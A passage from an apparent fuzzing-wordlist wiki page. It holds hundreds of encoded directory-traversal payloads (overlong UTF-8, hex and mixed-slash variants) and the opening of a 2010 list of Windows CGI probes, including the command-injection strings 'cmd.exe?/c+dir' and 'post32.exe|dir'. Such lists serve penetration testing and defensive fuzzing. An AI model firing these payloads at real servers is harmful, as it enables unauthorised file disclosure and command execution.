%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}&lt;br /&gt;
..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}&lt;br /&gt;
///%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
\\\%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..//{FILE}&lt;br /&gt;
..//..//{FILE}&lt;br /&gt;
..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
..///..///{FILE}&lt;br /&gt;
..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..\\{FILE}&lt;br /&gt;
..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
./\/./{FILE}&lt;br /&gt;
./\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
./../{FILE}&lt;br /&gt;
./.././../{FILE}&lt;br /&gt;
./.././.././../{FILE}&lt;br /&gt;
./.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././.././../{FILE}&lt;br /&gt;
.\..\{FILE}&lt;br /&gt;
.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.//..//{FILE}&lt;br /&gt;
.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../..//{FILE}&lt;br /&gt;
../..//../{FILE}&lt;br /&gt;
../..//../..//{FILE}&lt;br /&gt;
../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//{FILE}&lt;br /&gt;
../..//../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//../..//{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\\{FILE}&lt;br /&gt;
..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
../..///{FILE}&lt;br /&gt;
../..//..///{FILE}&lt;br /&gt;
../..//../..///{FILE}&lt;br /&gt;
../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..///{FILE}&lt;br /&gt;
../..//../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..//../..///{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\..\\\{FILE}&lt;br /&gt;
..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Common Windows CGI   (Update: 17 March 2010 &lt;br /&gt;
# fuzz inside executable directories&lt;br /&gt;
# on windows, this is usually /scripts or /cgi-bin&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
cart32.exe&lt;br /&gt;
get32.exe&lt;br /&gt;
visadmin.exe&lt;br /&gt;
foxweb.exe&lt;br /&gt;
webplus.exe?about&lt;br /&gt;
fpsrvadm.exe&lt;br /&gt;
MsmMask.exe&lt;br /&gt;
cmd.exe?/c+dir&lt;br /&gt;
cmd1.exe?/c+dir&lt;br /&gt;
post32.exe|dir%20c:\\&lt;br /&gt;
